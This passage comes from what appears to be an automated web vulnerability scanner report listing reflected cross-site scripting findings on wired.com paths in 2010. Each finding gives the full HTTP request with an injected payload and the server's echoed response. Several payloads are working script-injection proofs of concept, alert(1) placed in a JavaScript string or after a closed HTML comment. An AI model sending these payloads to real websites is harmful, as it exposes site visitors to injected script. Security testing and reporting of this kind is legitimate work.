<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_staff56f7e"><a>3b00f27932b">
...[SNIP]...

1.800. http://www.wired.com/services/useragreement/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/useragreement/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f20f7"><a>259a66d40d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /servicesf20f7"><a>259a66d40d4/useragreement/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:12:46 GMT
Date: Mon, 22 Nov 2010 01:08:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_servicesf20f7"><a>259a66d40d4 ss_useragreement">
...[SNIP]...

1.801. http://www.wired.com/services/useragreement/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/useragreement/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8e2b"><a>cf2de19af99 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/useragreementc8e2b"><a>cf2de19af99/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Expires: Mon, 22 Nov 2010 01:09:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 22 Nov 2010 01:09:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_useragreementc8e2b"><a>cf2de19af99">
...[SNIP]...

1.802. http://www.wired.com/software [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /software

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fd50"><a>a4511ae9176 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /software9fd50"><a>a4511ae9176 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29196
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:26 GMT
Date: Mon, 22 Nov 2010 01:11:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_software9fd50"><a>a4511ae9176">
...[SNIP]...

1.803. http://www.wired.com/software/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /software/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46357"><a>d3030e2a7bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /software46357"><a>d3030e2a7bf/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29197
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 20:04:06 GMT
Date: Sun, 21 Nov 2010 20:00:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_software46357"><a>d3030e2a7bf">
...[SNIP]...

1.804. http://www.wired.com/software/coolapps [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /software/coolapps

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef060"><a>0d554ac2111 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /softwareef060"><a>0d554ac2111/coolapps HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29217
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:17:02 GMT
Date: Sun, 21 Nov 2010 23:13:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_softwareef060"><a>0d554ac2111 ss_coolapps">
...[SNIP]...

1.805. http://www.wired.com/software/coolapps [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /software/coolapps

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64fc1"><a>b463da81548 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /software/coolapps64fc1"><a>b463da81548 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29217
Vary: Accept-Encoding
Cache-Control: max-age=595
Expires: Sun, 21 Nov 2010 23:23:19 GMT
Date: Sun, 21 Nov 2010 23:13:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_software ss_coolapps64fc1"><a>b463da81548">
...[SNIP]...

1.806. http://www.wired.com/software/softwarereviews [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /software/softwarereviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dbd9"><a>73f2b0aee60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /software1dbd9"><a>73f2b0aee60/softwarereviews HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29231
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:17:07 GMT
Date: Sun, 21 Nov 2010 23:13:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_software1dbd9"><a>73f2b0aee60 ss_softwarereviews">
...[SNIP]...

1.807. http://www.wired.com/software/softwarereviews [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /software/softwarereviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 504ae"><a>019705efbbb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /software/softwarereviews504ae"><a>019705efbbb HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29231
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:29 GMT
Date: Sun, 21 Nov 2010 23:13:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_software ss_softwarereviews504ae"><a>019705efbbb">
...[SNIP]...

1.808. http://www.wired.com/software/webservices [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /software/webservices

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f306"><a>9703cc9441c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /software4f306"><a>9703cc9441c/webservices HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29223
Vary: Accept-Encoding
Cache-Control: max-age=237
Expires: Sun, 21 Nov 2010 23:17:05 GMT
Date: Sun, 21 Nov 2010 23:13:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_software4f306"><a>9703cc9441c ss_webservices">
...[SNIP]...

1.809. http://www.wired.com/software/webservices [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /software/webservices

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 572c1"><a>7e145b38693 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /software/webservices572c1"><a>7e145b38693 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29223
Vary: Accept-Encoding
Cache-Control: max-age=579
Expires: Sun, 21 Nov 2010 23:23:10 GMT
Date: Sun, 21 Nov 2010 23:13:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_software ss_webservices572c1"><a>7e145b38693">
...[SNIP]...

1.810. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /special_multimedia/2008/ff_futurefood_1611

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc26d"><a>623e3dbca4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /special_multimediacc26d"><a>623e3dbca4/2008/ff_futurefood_1611 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29335
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 22 Nov 2010 01:21:50 GMT
Date: Mon, 22 Nov 2010 01:11:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_special_multimediacc26d"><a>623e3dbca4 ss_2008 c_ff_futurefood_1611">
...[SNIP]...

1.811. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /special_multimedia/2008/ff_futurefood_1611

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34135"><a>b00375039a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /special_multimedia/200834135"><a>b00375039a/ff_futurefood_1611 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 500 Internal Server Error
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:16:23 GMT
Date: Mon, 22 Nov 2010 01:12:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33729


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional
...[SNIP]...
<body class="s_special_multimedia ss_200834135"><a>b00375039a c_ff_futurefood_1611">
...[SNIP]...

1.812. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /special_multimedia/2008/ff_futurefood_1611

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0c76"-alert(1)-"ba8f642ff66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /special_multimedia/2008f0c76"-alert(1)-"ba8f642ff66/ff_futurefood_1611 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 500 Internal Server Error
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=227
Expires: Mon, 22 Nov 2010 01:16:27 GMT
Date: Mon, 22 Nov 2010 01:12:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33753


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'special_multimedia;', kws:[ "ff_futurefood_1611","special_multimedia","2008f0c76"-alert(1)-"ba8f642ff66"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.813. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /special_multimedia/2008/ff_futurefood_1611

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebfab"-alert(1)-"73871f1db9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /special_multimedia/2008/ff_futurefood_1611ebfab"-alert(1)-"73871f1db9 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 500 Internal Server Error
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 22 Nov 2010 01:22:59 GMT
Date: Mon, 22 Nov 2010 01:12:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33749


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'special_multimedia;', kws:[ "2008","special_multimedia","ff_futurefood_1611ebfab"-alert(1)-"73871f1db9"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.814. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /special_multimedia/2008/ff_futurefood_1611

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0cec"><a>2ea48508115 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /special_multimedia/2008/ff_futurefood_1611b0cec"><a>2ea48508115 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 500 Internal Server Error
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 22 Nov 2010 01:22:43 GMT
Date: Mon, 22 Nov 2010 01:12:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional
...[SNIP]...
<body class="s_special_multimedia ss_2008 c_ff_futurefood_1611b0cec"><a>2ea48508115">
...[SNIP]...

1.815. http://www.wired.com/support/feedback.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /support/feedback.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload b8357--><script>alert(1)</script>dd4af33e9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /supportb8357--><script>alert(1)</script>dd4af33e9c/feedback.html HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29404
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:37 GMT
Date: Mon, 22 Nov 2010 01:10:37 GMT
Connection: close


